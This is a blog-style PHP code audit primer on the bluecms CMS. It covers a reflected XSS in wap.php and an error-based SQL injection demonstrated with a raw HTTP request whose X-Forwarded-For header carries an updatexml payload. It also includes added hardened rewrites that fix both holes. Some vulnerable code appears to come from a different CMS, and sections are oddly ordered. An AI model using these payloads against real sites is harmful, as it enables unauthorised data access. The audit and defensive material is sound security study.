bluecms code audit primer
2022-06-27 01:53:00 [qq_42307546]
bluecms is a very simple CMS and a good fit for beginners learning PHP code auditing. Here I run Seay's automated audit over it directly and then verify the findings one by one.

Front-end reflected XSS, found in wap.php: the t parameter is read via $_REQUEST and echoed straight into the page.
```php
<?php
$t=$_REQUEST['t'];
//echo $t;
//exit;
?>
<script type="text/javascript">
// If you only redirect the home page and dynamic browsing is enabled, set wap.php as the first default document.
// If static browsing is enabled, set index.html as the first default document and add the mobile-site redirect check to index.html.
var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire");
var browser = navigator.userAgent.toLowerCase();
var isMobile = false;
for (var i=0; i<mobileAgent.length; i++)
{
    if (browser.indexOf(mobileAgent[i])!=-1)
    {
        isMobile = true;
        //alert(mobileAgent[i]);
        // t is echoed unescaped into a JavaScript string literal: this is the injection point
        location.href = 'm.php?t=<?php echo $_REQUEST['t'] ?>';
        break;
    }
    else
    {
        location.href = 'index.php?t=<?php echo $_REQUEST['t'] ?>';// do not add the mobile-site redirect check to the home page template
    }
}
</script>
```
Simply visiting wap.php?t= with a payload in t triggers it.

Error-based SQL injection in the message board: the client IP taken from the request header is not filtered before being concatenated into the SQL statement.
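As an added example (not bluecms code), here is how the wap.php redirect above can be rebuilt so that t never reaches the script as raw text: the value is checked against an allow-list of template names (the names are assumed), URL-encoded for the query string, and JSON-encoded so it can only ever be a string literal inside the JavaScript. The loop is also restructured so the redirect happens once, after the agent check, instead of on every iteration.

```php
<?php
// Added example, not part of bluecms: hardened version of the wap.php redirect.
// Assumptions: the allowed template names below are illustrative.

// Return a template name from the allow-list, or the default for anything else.
function safe_template(?string $t): string
{
    $allowed = ['default', 'blue', 'green'];   // assumed template names
    if ($t !== null && in_array($t, $allowed, true)) {
        return $t;
    }
    return 'default';
}

// Build the redirect script. Each target URL is URL-encoded for the query
// string and then JSON-encoded (with the HTML-sensitive characters hex-escaped)
// so the browser always sees a plain string literal, never injected code.
function build_redirect_script(?string $t): string
{
    $safe  = safe_template($t);
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $mobile = json_encode('m.php?t=' . rawurlencode($safe), $flags);
    $index  = json_encode('index.php?t=' . rawurlencode($safe), $flags);

    return <<<JS
<script type="text/javascript">
var mobileAgent = ["iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire"];
var browser = navigator.userAgent.toLowerCase();
var isMobile = false;
for (var i = 0; i < mobileAgent.length; i++) {
    if (browser.indexOf(mobileAgent[i]) != -1) { isMobile = true; break; }
}
// Decide once, after the loop, instead of reassigning location.href on every iteration.
location.href = isMobile ? $mobile : $index;
</script>
JS;
}

$t = isset($_REQUEST['t']) ? (string) $_REQUEST['t'] : null;
echo build_redirect_script($t);
```

The allow-list is what actually closes the hole: any t that is not a known template name is replaced by the default. The two encodings are defence in depth for the case where a future template name contains characters that matter in a URL or a script.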
```php
function add(){
    if($GLOBALS['G_DY']['vercode']==1){
        if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("验证码错误");
    }
    if(!$this->syArgs('tid'))message("请选择栏目");
    $tid=$this->syArgs('tid');
    $this->type=syDB('classtype')->find(array('tid'=>$tid),null,'molds,classname,msubmit');
    if($this->type['msubmit']!=1){
        $this->member->p_r($this->type['msubmit']);
    }
    $isshow = ($this->my['group']['audit']==1) ? 1 : 0;
    $user = ($this->my['id']!=0) ? $this->my['user'] : '游客';
    $fmolds = ($this->syArgs('fmolds',1)!='') ? $this->syArgs('fmolds',1) : '';
    $title = ($this->syArgs('title',1)!='') ? $this->syArgs('title',1) : $this->type['classname'];
    $body = ($this->syArgs('body',1)!='') ? $this->syArgs('body',1) : '';
    $row1 = array('tid' => $tid,'fmolds' => $fmolds,'faid' => $this->syArgs('faid'),'title' => $title,'addtime' => time(),'orders' => 0,'isshow' => $isshow,'user' => $user,'body' => $body,'reply'=>'');
    $row2=$this->fields_args('message',$tid);
    $add = syClass('c_message');
    $newv=$add->syVerifier($row1);
    echo $newv;
    if(false == $newv)
    {
        $a=$add->create($row1);$row2=array_merge($row2,array('aid' => $a));
        syDB('message_field')->create($row2);
        if($this->my['id']!=0){
            syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'uid'=>$this->my['id']),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
        }else{
            // GetIP() returns the header-supplied address unfiltered, and it is concatenated into the UPDATE
            syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'ip'=>GetIP()),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
        }
        //message('发布成功',$GLOBALS["WWW"]);// bluecms returned to the home page
        message('发布成功');// return to the current page
    }
    else
    {
        message_err($newv);
    }
}
```
Just craft the request directly:

```http
POST /index.php?c=message&a=add&tid=23 HTTP/1.1
Host: www.blue.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Forwarded-For: 8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))####
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.blue.com:8080
Connection: close
Referer: http://www.blue.com:8080/?c=message&a=type&tid=23
Cookie: PHPSESSID=1gobivh9getno63fuj0d67knn5
Upgrade-Insecure-Requests: 1

title=111&u_nianlin=111&download=111&hand=0006197981&body=1111
```
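The root cause of the injection above is that the header value goes into SQL both unvalidated and unparameterised. As an added example (not bluecms code), the helper below only trusts X-Forwarded-For when the direct peer is a configured proxy, validates whatever it takes with filter_var, and the insert binds the IP as a parameter. The table and column names are assumptions for illustration, and the request environment at the bottom is constructed to reproduce the audited header.

```php
<?php
// Added example, not part of bluecms. Assumed schema: message(title, body, ip, addtime).

// Return a syntactically valid client IP, or null when nothing trustworthy is available.
// X-Forwarded-For is only consulted when REMOTE_ADDR is a trusted proxy, because any
// client can set that header to an arbitrary string.
function client_ip(array $server, array $trusted_proxies = []): ?string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    if (in_array($remote, $trusted_proxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // Only the first hop is meaningful; validate it and reject anything else.
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
        return null; // header present but not an IP address: treat as suspicious
    }
    return $remote;
}

// Insert a message with every value bound as a parameter; nothing is concatenated into SQL.
function record_message(PDO $db, string $title, string $body, ?string $ip): int
{
    $stmt = $db->prepare('INSERT INTO message (title, body, ip, addtime) VALUES (:title, :body, :ip, :t)');
    $stmt->execute([':title' => $title, ':body' => $body, ':ip' => $ip, ':t' => time()]);
    return (int) $db->lastInsertId();
}

// Constructed request environment reproducing the audited header (not a real capture).
$fake_server = [
    'REMOTE_ADDR'          => '203.0.113.10',
    'HTTP_X_FORWARDED_FOR' => "8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))####",
];

// Case 1: the peer is not a trusted proxy, so the header is ignored entirely.
var_dump(client_ip($fake_server));
// Case 2: the peer is a trusted proxy, but the forwarded value fails validation.
var_dump(client_ip($fake_server, ['203.0.113.10']));

// In-memory SQLite stand-in for the message table to show the parameterised insert.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE message (aid INTEGER PRIMARY KEY, title TEXT, body TEXT, ip TEXT, addtime INTEGER)');
$aid = record_message($db, '111', '1111', client_ip($fake_server));
var_dump($db->query('SELECT ip FROM message WHERE aid = ' . $aid)->fetchColumn());
```

In the first call the header is discarded and REMOTE_ADDR is returned; in the second the proxy is trusted but the forwarded string is not an IP, so the function returns null rather than passing the payload on. A null IP is a useful detection signal in its own right: logging those requests with the rejected header value gives the operator a record of attempts against this endpoint.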
That's all for this one. The password here is hashed with md5 twice; there are still many more vulnerabilities that I haven't audited yet.